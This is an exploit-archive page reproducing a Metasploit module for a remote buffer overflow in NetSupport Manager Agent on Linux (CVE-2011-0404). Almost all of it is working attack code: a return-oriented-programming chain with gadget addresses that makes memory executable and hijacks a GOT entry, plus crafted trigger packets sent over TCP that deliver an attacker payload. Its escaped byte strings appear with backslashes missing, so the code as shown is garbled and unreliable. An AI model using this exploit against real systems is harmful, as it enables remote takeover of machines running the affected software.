[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : NetSupport Manager Agent Remote Buffer Overflow
# Published : 2011-03-03
# Author :
# Previous Title : Sun Java Applet2ClassLoader Remote Code Execution Exploit
# Next Title : 7-Technologies IGSS 9.00.00.11059 Multiple Vulnerabilities


##
# $Id: netsupport_manager_agent.rb 11868 2011-03-03 01:04:47Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NetSupport Manager Agent Remote Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in NetSupport Manager Agent. It
				uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.
			},
			'Author'         =>
				[
					'Luca Carettoni (@_ikki)',  # original discovery / exploit
					'Evan',  # ported from exploit-db exploit
					'jduck'  # original proftpd_iac ROP, minor cleanups
				],
			'Arch'           => ARCH_X86,
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11868 $',
			'References'     =>
				[
					[ 'CVE', '2011-0404' ],
					[ 'OSVDB', '70408' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/15937/' ]
				],
			'Privileged'     => true,
			'Platform'       => 'linux',
			'Payload'        =>
				{
					'Space'    => 0x975,
					'BadChars' => "",
					'DisableNops'  => true,
				},
			'Targets'        =>
				[
					[ 'linux',
						{
							'Ret' => 0x0805e50c, # pop eax ; pop ebx ; pop ebp ;;
							'Pad' => 975,
							'RopStack' =>
								[
									### mmap isn't used in the binary so we need to resolve it in libc
									0x00041160, # mmap64 - localtime
									0xa9ae0e6c, # 0x8092b30 - 0x5e5b1cc4, localtime will become mprotect
									0xcccccccc,
									0x08084662, # add    DWORD PTR [ebx+0x5e5b1cc4],eax; pop edi; pop ebp ;;
									0xcccccccc,
									0xcccccccc,
									0x080541e4, # localtime@plt (now mmap64)
									0x080617e3, # add esp 0x10 ; pop ebx ; pop esi ; pop ebp ;;
									0, 0x20000, 0x7, 0x22, 0xffffffff, 0, # mmap64 arguments
									0x0, # unused
									0x08066332, # pop edx; pop ebx; pop ebp ;;
									"x89x1cxa8xc3".unpack('V').first, # mov [eax+ebp*4], ebx
									0xcccccccc,
									0xcccccccc,
									0x080555c4, # mov [eax] edx ; pop ebp ;;
									0xcccccccc,
									#0x0807385a, # push eax ; adc al 0x5d ;;

									### this is  the stub used to copy shellcode from the stack to
									### the newly mapped executable region
									#x8DxB4x24x7DxFBxFF      # lea esi,[dword esp-0x483]
									#x8Dx78x12                  # lea edi,[eax+0x12]
									#x6Ax7F                      # push byte +0x7f
									#x59                          # pop ecx
									#xF3xA5                      # rep movsd

									### there are no good jmp eax so  overwrite getrlimits GOT entry
									0x0805591b, # pop ebx; pop ebp ;;
									0x08092d68 - 0x4, # 08092d68  0002f007 R_386_JUMP_SLOT   00000000   getrlimit
									0x1,        # becomes ebp
									0x08084f38, # mov [ebx+0x4] eax ; pop ebx ; pop ebp ;;
									0xfb7c24b4, # become eb
									0x01,
									0x08054ac4, # <getrlimit@plt>
									0x0805591b, # pop ebx; pop ebp ;;
									#0xffff8d78, # become ebx
									0x788dffff,
									0x2,
									0x08054ac4, # <getrlimit@plt>
									0x0805591b, # pop ebx; pop ebp ;;
									0x597f6a12,
									0x3,
									0x08054ac4, # <getrlimit@plt>
									0x0805591b, # pop ebx; pop ebp ;;
									0x9090a5f2,
									0x4,
									0x08054ac4, # <getrlimit@plt>
									0x0805591b, # pop ebx; pop ebp ;;
									0x8d909090,
									0x0,
									0x08054ac4, # <getrlimit@plt>
									0xcccccccc,
									0x01010101,
								]
						}
					]
				],
			'DisclosureDate' => 'Feb 12 2010',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(5405),
			], self.class)
	end

	def exploit
		connect

		#pop_eax_ebx ;
		#0x8084662 # add    DWORD PTR [ebx+0x5e5b1cc4],eax ;;
		triggerA = "x15x00x5ax00" + "x41" * 1024 + "x00x00x00" +
			"x00x00x00x00x00x00x00x00x00x00"

		triggerB = "x25x00x51x00x81x41x41x41x41x41x41x00" +
			"x41x00x00x00x00x00x00x00x00x00x00x00" +
			"x00x00x00x00x00x00x00x00x00x00x00x00" +
			"x00x00x00"

		triggerC = "x37x00x03x00x0ax00x00x00x00x00x58xb4" +
			"x92xffx00x00x69x6bx6bx69x00x57x4fx52" +
			"x4bx47x52x4fx55x50x00x3cx3e" + #pleasure trail
			#"xcc" +
			"x90" +
			payload.encoded +
			"xcc" * (target['Pad'] - payload.encoded.length) +
			[target.ret].pack('V')

		new = ''
		if target['RopStack']
			new << target['RopStack'].map { |e|
				if e == 0xcccccccc
					rand_text(4).unpack('V').first
				else
					e
				end
			}.pack('V*')
		end

		triggerC << new
		triggerC << "x00" * 4
		triggerC << "x00x00x31x32x2ex36x32x2ex31x2ex34x32"
		triggerC << "x30x00x31x30x00x00"

		triggerD = "x06x00x07x00x20x00x00x00x0ex00x32x00" +
			"x01x10x18x00x00x01x9fx0dx00x00xe0x07" +
			"x06x00x07x00x00x00x00x00x02x00x4ex00" +
			"x02x00xacx00x04x00x7fx00x00x00"

		print_status("Sending A")
		sock.put(triggerA)
		select(nil, nil, nil, 1)

		print_status("Sending B")
		sock.put(triggerB)
		select(nil, nil, nil, 1)

		print_status("Sending C")
		sock.put(triggerC)
		select(nil, nil, nil, 1)

		print_status("Sending D")
		sock.put(triggerD)
		select(nil, nil, nil, 1)

		disconnect
	end
end